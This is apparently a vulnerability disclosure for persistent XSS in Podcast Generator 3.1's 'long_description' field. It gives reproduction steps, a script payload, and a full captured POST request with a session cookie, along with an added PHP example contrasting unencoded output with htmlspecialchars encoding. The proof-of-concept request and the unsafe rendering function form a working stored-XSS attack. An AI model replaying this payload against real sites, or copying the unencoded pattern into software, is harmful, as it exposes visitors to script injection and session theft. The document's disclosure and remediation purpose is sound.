# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
# Date: 13/05/2021
# Exploit Author: Ayşenur KARAASLAN
# Vendor Homepage: https://podcastgenerator.net/demoV2/
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
# Version: < 3.1.1
# CVE: N/A

Podcast Generator is an open source content management system written in PHP and specifically designed for podcast publishing.

# Description

The following is a proof of concept for the persistent XSS bug: the payload is stored once and then executes for any user who views the episode, including an unauthorized one.

1. Log in to your admin account.
2. The "Upload New Episode" and "Edit" forms contain a "Long Description" field. This field is not filtered, so JavaScript code can be placed in it.
3. Click the Home button.
4. Click the "More" button of the created or edited episode; the stored payload executes.

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: long_description
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>

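As an added example (not Podcast Generator's own code; the function names and the surrounding page fragment are hypothetical), the following PHP contrasts the rendering pattern that turns an unfiltered long_description value into a stored XSS with the output-encoded version that renders the advisory's payload as inert text:

```php
<?php
// Added example, not Podcast Generator's own code. Function names and the
// page fragment are hypothetical; the stored value is the advisory's payload.
declare(strict_types=1);

// Constructed sample: what an admin submitted in the long_description POST
// field, persisted verbatim by the application.
$storedLongDescription = '<script>prompt("aysenur-xss")</script>';

// Vulnerable pattern: the stored string is interpolated into the HTML page
// unchanged, so every visitor's browser parses and executes the script.
function renderLongDescriptionUnsafe(string $value): string
{
    return '<div class="long-description">' . $value . '</div>';
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside
// double- or single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string, which would silently drop content.
function renderLongDescriptionSafe(string $value): string
{
    $encoded = htmlspecialchars(
        $value,
        ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<div class="long-description">' . $encoded . '</div>';
}

// Quick self-check: the encoded output must not contain a raw tag opener.
function outputIsInert(string $html): bool
{
    return strpos($html, '<script') === false;
}

echo "Unsafe output:\n", renderLongDescriptionUnsafe($storedLongDescription), "\n\n";

$safe = renderLongDescriptionSafe($storedLongDescription);
echo "Encoded output:\n", $safe, "\n";
echo "Inert: ", outputIsInert($safe) ? 'yes' : 'no', "\n";
```

Run it with `php example.php`: the encoded output shows `&lt;script&gt;prompt(&quot;aysenur-xss&quot;)&lt;/script&gt;`, which a browser displays as literal text. The encoding has to be applied in every place the field is rendered, not only on one view, and if the field is meant to carry rich text an allow-list HTML sanitizer is required instead of htmlspecialchars, since encoding would also neutralize the intended markup. A Content-Security-Policy that disallows inline scripts limits the impact of any sink that is missed.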
# PoC

HTTP Request:

POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
Host: podcastgenerator.net
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4; _ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
Content-Length: 1590
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://podcastgenerator.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer: https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="userfile"

aysenurxss-poc.jpg
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="title"

Aysenur-PoC
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="description"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="countdown"

255
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="category[]"

about
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Day"

13
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Month"

5
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Year"

2021
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Hour"

14
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Minute"

29
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="long_description"

<script>prompt("aysenur-xss")</script>
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="keywords"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_name"

aysenur
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_email"

aysenur@emailaddress.com
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--